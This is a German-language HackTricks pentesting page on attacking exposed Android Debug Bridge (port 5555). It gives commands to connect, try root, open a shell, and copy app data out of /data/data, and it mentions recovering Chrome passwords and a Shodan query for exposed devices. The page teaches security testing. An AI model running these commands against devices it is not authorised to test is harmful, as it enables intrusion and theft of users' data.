hacktricks/network-services-pentesting/5555-android-debug-bridge.md

5555 - Android Debug Bridge

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

Grundinformationen

Von den Dokumenten:

Android Debug Bridge (adb) ist ein vielseitiges Befehlszeilenwerkzeug, mit dem Sie mit einem Gerät kommunizieren können. Der adb-Befehl erleichtert eine Vielzahl von Geräteaktionen, wie z. B. das Installieren und Debuggen von Apps, und bietet Zugriff auf eine Unix-Shell, die Sie verwenden können, um eine Vielzahl von Befehlen auf einem Gerät auszuführen.

Standardport: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Connect

Wenn Sie den ADB-Dienst, der an einem Port eines Geräts läuft, finden und sich damit verbinden können, können Sie eine Shell im System erhalten:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Für weitere ADB-Befehle siehe die folgende Seite:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

App-Daten dumpen

Um die Daten einer Anwendung vollständig herunterzuladen, können Sie:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Du kannst diesen Trick verwenden, um sensible Informationen wie Chrome-Passwörter abzurufen. Für weitere Informationen dazu siehe die bereitgestellten Informationen und Referenzen hier.

Shodan

• android debug bridge

{% hint style="success" %} Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Überprüfe die Abonnementpläne!
• Tritt der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folge uns auf Twitter 🐦 @hacktricks_live.
• Teile Hacking-Tricks, indem du PRs an die HackTricks und HackTricks Cloud GitHub-Repos einreichst.

{% endhint %}